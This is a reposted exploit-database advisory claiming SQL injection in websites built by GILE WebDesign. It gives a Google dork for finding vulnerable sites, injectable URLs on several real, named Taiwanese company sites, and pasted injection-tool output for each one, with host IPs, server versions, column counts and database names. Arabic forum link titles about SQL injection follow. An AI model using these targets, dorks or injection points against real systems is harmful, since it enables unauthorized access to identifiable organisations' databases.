GILE WebDesign SQL Injection Vulnerability

Author: TUNISIAN CYBER
[+] Exploit Title:  GILE WebDesign SQL Injection Vulnerability
[+] Date: 29-11-2013
[+] Category: WebApp
[+] Google Dork: intext:"Design by GILE" inurl:php
[+] Tested on: Win7 , ubuntu 13.04


########################################################################################


Demos:
http://www.lufada.com.tw/product_list.php?CateId=1'
http://www.yafood.com.tw/prodcate.php?CateId=3'
http://www.phr.com.tw/bullhorn_detail.php?ActivityId=6
http://www.tgksound.com.tw/news_detail.php?NId=16'
http://www.tgksound.com.tw/news_detail.php?NId=16'
http://www.gile.com.tw/work_list.php?Cate=2'

Host IP: 203.69.42.184
Web Server: Apache
Powered-by: PHP/5.2.11
Keyword Found: have
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Selected Column Count is 1
Valid String Column is 1
Current DB: DBL01767

Host IP: 122.147.44.136
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.2.12
Powered-by: PleskLin
Keyword Found: have
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Selected Column Count is 3
Valid String Column is 2
Current DB: DBL01643

Host IP: 60.199.166.69
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.2.13
Powered-by: PleskLin
Keyword Found: ***227;€Œ***229;***141;°***229;°¼***230;–‡***229;Œ–ç¯€-***230;***732;***376;***229;…‰é–ƒè€€***227;€***381;***229;***141;°***227;€***143;***230;–°***229;¹´***227;€***141;***230;´»***229;‹•
Injection type is Integer
DB Server: MySQL >=5
Selected Column Count is 20
Current DB: phr

Host IP: 60.199.166.69
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.2.13
Powered-by: PleskLin
Keyword Found: have
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Selected Column Count is 17
Valid String Column is 2
Current DB: sound98k

Host IP: 122.147.44.136
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.2.12
Powered-by: PleskLin
Keyword Found: have
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Selected Column Count is 2
Valid String Column is 2
Current DB: gile

########################################################################################
[/PHP]

1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team[/QUOTE]

» موضوعنا اليوم عن حقن قواعد البيانات ( sql injection )
» برنامج Acunetix Web Vulnerability Scannerلي كشف ثغرات الموقع
» الـ SQL Injection ، سلاح الدمار الشامل ضد تطبيقات الويب
» WordPress Blooog-v1.1 Theme Cross Site Scripting Vulnerability